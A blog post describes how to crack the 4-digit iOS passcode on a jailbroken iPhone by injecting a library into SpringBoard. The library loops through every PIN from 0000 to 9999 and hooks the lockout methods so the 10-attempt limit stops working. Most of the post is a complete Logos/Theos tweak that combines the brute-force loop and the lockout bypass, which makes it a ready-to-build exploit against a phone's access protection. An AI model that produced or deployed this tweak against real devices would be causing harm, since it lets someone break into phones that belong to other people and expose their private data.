Cracking Apple's 4-digit iOS Passcode
You have probably read about MDSec's black box that manages to gain access to iPhones running up to iOS 8.1 by brute-forcing the passcode over a USB connection that simulates keypad entry. This kind of attack is not very practical on its own, because iOS's protection against brute-force attacks blocks passcode entry after 10 failed attempts.
I tried to replicate the attack purely in software, without any hardware hacks. That means the device has to be jailbroken so that unsigned code can run on it (or you can bring your own exploit for that ;p).

I wrote a small loop that walks through every possible 4-digit passcode, from 0000 up to 9999.
When I made a class-dump of the SpringBoard process, I found a class called SBDeviceLockController with an interesting method:
- (BOOL)attemptDeviceUnlockWithPassword:(NSString *)password appRequested:(BOOL)requested;
I then wrote a dynamic library that hooks into the SpringBoard process and runs the loop described above once SpringBoard has finished launching. The loop calls this method for each possible 4-digit combination.
As soon as it returns YES, we know that the passcode we just passed in is the correct one.
I relaunched the SpringBoard process to test my code at runtime, and as expected it worked. Well, for the most part... Watching syslog, I saw that only the first 10 passcode attempts went through; after that the operating system blocked further entry and displayed an "iPhone is Disabled" alert on the lock screen. I had to find a workaround.
I looked back at the class-dump of the same class and found these related methods:
- (BOOL)_temporarilyBlocked;
- (BOOL)isPasscodeLockedOrBlocked;
- (BOOL)isBlocked;
I hooked those instance methods to return NO. When I ran the code again, the device no longer disabled passcode entry after 10 failed attempts. The code is now able to try one 4-digit passcode every 5 seconds, which puts the worst case at 10,000 combinations x 5 seconds = 50,000 seconds, or roughly 14 hours, to cover every possible pin.
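Below is what the two pieces described above, the 0000-9999 loop and the three lockout hooks, look like when put together as a Logos tweak for CydiaSubstrate built with Theos. This is an added illustration written for this page, not the libTransLock source. The class name and the four selectors are the ones from the class-dump quoted above; everything else is an assumption: that the controller singleton is reachable through a sharedController class method, that UIApplicationDidFinishLaunchingNotification is a good enough signal that SpringBoard has finished launching, and that the unlock call should be made on the main thread.

```objective-c
// Added example (Logos/Theos tweak injected into SpringBoard via CydiaSubstrate).
// Not the libTransLock source. Class name and selectors are the ones from the
// class-dump on this page; sharedController and the launch notification are
// assumptions.
#import <Foundation/Foundation.h>
#import <UIKit/UIKit.h>

// Forward declaration so the compiler knows the selectors seen in the class-dump.
@interface SBDeviceLockController : NSObject
+ (instancetype)sharedController;   // assumed accessor for the singleton
- (BOOL)attemptDeviceUnlockWithPassword:(NSString *)password appRequested:(BOOL)requested;
@end

static const NSTimeInterval kAttemptInterval = 5.0; // one attempt every 5 s, as in the post

// Zero-padded 4-digit pin for an index: 7 -> "0007", 9999 -> "9999".
static NSString *PinString(NSUInteger index) {
    return [NSString stringWithFormat:@"%04lu", (unsigned long)index];
}

// Walks 0000..9999, asking SpringBoard's lock controller to unlock with each
// candidate. Returns the working pin, or nil if none matched. Must be called
// off the main thread because it blocks between attempts.
static NSString *BruteForcePasscode(SBDeviceLockController *controller) {
    for (NSUInteger i = 0; i < 10000; i++) {
        NSString *pin = PinString(i);
        __block BOOL unlocked = NO;
        // The lock controller is UI state; assume it wants the main thread.
        dispatch_sync(dispatch_get_main_queue(), ^{
            unlocked = [controller attemptDeviceUnlockWithPassword:pin appRequested:NO];
        });
        if (unlocked) {
            NSLog(@"[translock-example] passcode found: %@", pin);
            return pin;
        }
        [NSThread sleepForTimeInterval:kAttemptInterval];
    }
    return nil;
}

// Neutralise the lockout: every "am I blocked?" query now answers NO, so the
// 10-failure limit never stops passcode entry.
%hook SBDeviceLockController
- (BOOL)_temporarilyBlocked { return NO; }
- (BOOL)isPasscodeLockedOrBlocked { return NO; }
- (BOOL)isBlocked { return NO; }
%end

%ctor {
    // SpringBoard is a UIApplication, so wait for it to finish launching
    // before touching the lock controller (assumed to be safe at this point).
    [[NSNotificationCenter defaultCenter]
        addObserverForName:UIApplicationDidFinishLaunchingNotification
                    object:nil
                     queue:nil
                usingBlock:^(NSNotification *note) {
        SBDeviceLockController *controller = [%c(SBDeviceLockController) sharedController];
        dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_BACKGROUND, 0), ^{
            BruteForcePasscode(controller);
        });
    }];
}
```

The tweak's filter plist should restrict injection to the com.apple.springboard bundle so the library only loads into SpringBoard; on a device where the passcode is longer than four digits or alphanumeric, the loop above simply exhausts its 10,000 candidates and returns nil.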
You can find libTransLock on my GitHub.